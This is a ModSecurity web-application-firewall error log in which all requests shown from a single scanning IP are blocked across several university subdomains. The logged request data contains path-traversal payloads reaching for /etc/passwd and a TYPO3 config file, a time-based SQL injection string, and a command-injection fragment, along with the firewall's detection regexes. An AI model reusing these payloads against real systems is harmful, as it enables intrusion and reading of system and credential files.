[Tue Aug 29 11:43:14.402901 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAevkSwAAAAA"]
[Tue Aug 29 11:43:14.456630 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAevkS4AAAAA"]
[Tue Aug 29 11:43:14.463594 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAActbPUAAAAH"]
[Tue Aug 29 11:43:14.467324 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAdTBEsAAAAY"]
[Tue Aug 29 11:43:14.475212 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAewCWMAAAAI"]
[Tue Aug 29 11:43:15.547917 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAeX1GIAAAAK"]
[Tue Aug 29 11:43:15.635143 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAcsLKgAAAAE"]
[Tue Aug 29 11:43:15.653539 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAevkTQAAAAA"]
[Tue Aug 29 11:43:15.654859 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13Y8Co-f0AAAeChb0AAAAw"]
[Tue Aug 29 11:43:15.660381 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAbo-hMAAAAi"]
[Tue Aug 29 11:43:15.704283 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdECesAAAAW"]
[Tue Aug 29 11:43:16.427871 2023] [:error] [pid 1970] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ZMCo-f0AAAey2ncAAAAO"]
[Tue Aug 29 11:43:18.397514 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdSZSgAAAAX"]
[Tue Aug 29 11:43:18.401285 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdQ3mcAAAAV"]
[Tue Aug 29 11:43:18.408378 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAARpg6UAAAAU"]
[Tue Aug 29 11:43:18.433647 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAexIAoAAAAN"]
[Tue Aug 29 11:43:18.436108 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdb7o0AAAAb"]
[Tue Aug 29 11:43:18.438355 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdTBFgAAAAY"]
[Tue Aug 29 11:43:18.438693 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAbo-hkAAAAi"]
[Tue Aug 29 11:43:18.439166 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAARpg6YAAAAU"]
[Tue Aug 29 11:43:18.457329 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdECfIAAAAW"]
[Tue Aug 29 11:43:18.457752 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAeX1G4AAAAK"]
[Tue Aug 29 11:43:19.376489 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13Z8Co-f0AAAexIA0AAAAN"]
[Tue Aug 29 11:43:19.384026 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13Z8Co-f0AAAdQ3moAAAAV"]
[Tue Aug 29 11:43:20.359004 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdQ3mwAAAAV"]
[Tue Aug 29 11:43:20.391021 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAcsLLEAAAAE"]
[Tue Aug 29 11:43:20.402878 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdxUWIAAAAC"]
[Tue Aug 29 11:43:20.436633 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdxUWMAAAAC"]
[Tue Aug 29 11:43:20.476019 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAbo-h8AAAAi"]
[Tue Aug 29 11:43:21.419690 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAbo-iIAAAAi"]
[Tue Aug 29 11:43:21.429665 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13acCo-f0AAAdftYcAAAAG"]
[Tue Aug 29 11:43:21.443306 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAbo-iMAAAAi"]
[Tue Aug 29 11:43:21.456054 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdQ3nMAAAAV"]
[Tue Aug 29 11:43:21.459550 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAXNua4AAAAg"]
[Tue Aug 29 11:43:21.460880 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdECfsAAAAW"]
